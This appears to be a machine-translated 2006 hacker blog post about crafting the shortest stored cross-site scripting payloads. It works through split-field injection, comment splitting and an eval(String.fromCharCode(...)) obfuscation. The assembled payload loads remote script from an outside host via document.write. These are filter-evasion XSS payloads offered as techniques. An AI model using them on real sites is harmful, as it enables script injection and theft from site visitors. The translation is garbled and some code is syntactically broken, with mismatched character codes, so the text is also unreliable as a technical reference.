Find the shortest cross-site code (by jmdcw)

 
Source: VBS small shop

On that day, I asked, What is the shortest cross-site statement? In the past, I would think like this: the normal cross-site code: <script> alert ("a") </script>, check, a total of 27 characters. Hey, but I saw an article on the hacker manual, crazy cross-site trip. here we mention another method of cross-site statements:
<Script> z = document. </script>
<Script> z = z + write ("</script>
<Script> z = z + <script </script>
<Script> z = z + src = ht </script>
<Script> z = z + tp: // ww </script>
<Script> z = z + w. pc010 </script>
<Script> z = z +. cn/1. </script>
<Script> z = z + js> </SC </script>
<Script> z = z + ript> ") </script>
<Script> eval (z) </script>

Write these statements separately. As long as the written statements are displayed on a page, the code is finally introduced into variable z, and the total one is:
Document. write ("<script src = http://www.pc010.cn/1.js> </script> ")

Then run the z variable using the eval () function to execute the cross-site effect. Lcx commented in the article that the minimum valid code can be 26 letters, namely <script> z = z + d "</script>, the minimum cross-site length is 26 characters. (When searching for information on the Internet today, we found that this method can contain one less character, namely: <script> z + = d "</script>, replace = z + with + =. Hey, you can reduce the number of characters by 25 characters. However, it seems sad that I can only make breakthroughs on the foundation of others! :(). After replying to Jianxin, he turned back to a smiling face. I felt this guy had to find a shorter cross-site method. /Jmdcw/

Sure enough, today I opened phpwind vulnerability in the Ninth Issue of hackers' manual (for some reason, I haven't carefully read the book for a long time) and mentioned the shorter cross-site code, as follows:
<Script> open (/*
*/"Http: // 127 "/*
*/+ ". 0.0.1 /"/*
*/) </Script>

Here, the/* and */are the script's Annotation statements, which are submitted separately. The same condition is that the submitted code must be on a page, as shown in the following figure:

<Script> open (/* Invalid Content not displayed */"http: // 127"/* Invalid Content not displayed */+ ". 0.0.1/"/* Invalid Content not displayed */) </script>

So what is the shortest statement? It seems that <script> cannot be used separately. Apart from this, functions defined by the script, such as open, cannot run normally even after being separated./jmdcw,

First convert the top statement: document. write ("<script src = http://www.pc010.cn/1.js> </script>") to a 10-digit representation character:

100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116, 62,34, 41,59

Run the following command with eval and String. fromCharCode:
<Script> eval (String. fromCharCode (100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116,) </script>

The following uses the Jianxin Method for Splitting:
<Script> /*
*/Eval (/*
*/String /*
*/./*
*/FromCharCode /*
*/(100 ,/*
*/111,99 ,/*
*/......./*
*/59 ))/*
*/</Script>

.... The longest statement is */fromCharCode/*, 16 characters, because this is the function name reserved by the script, it can be seen that the smallest cross-site statement is determined by the function used.

BY lonely hedgehog
2006-12-10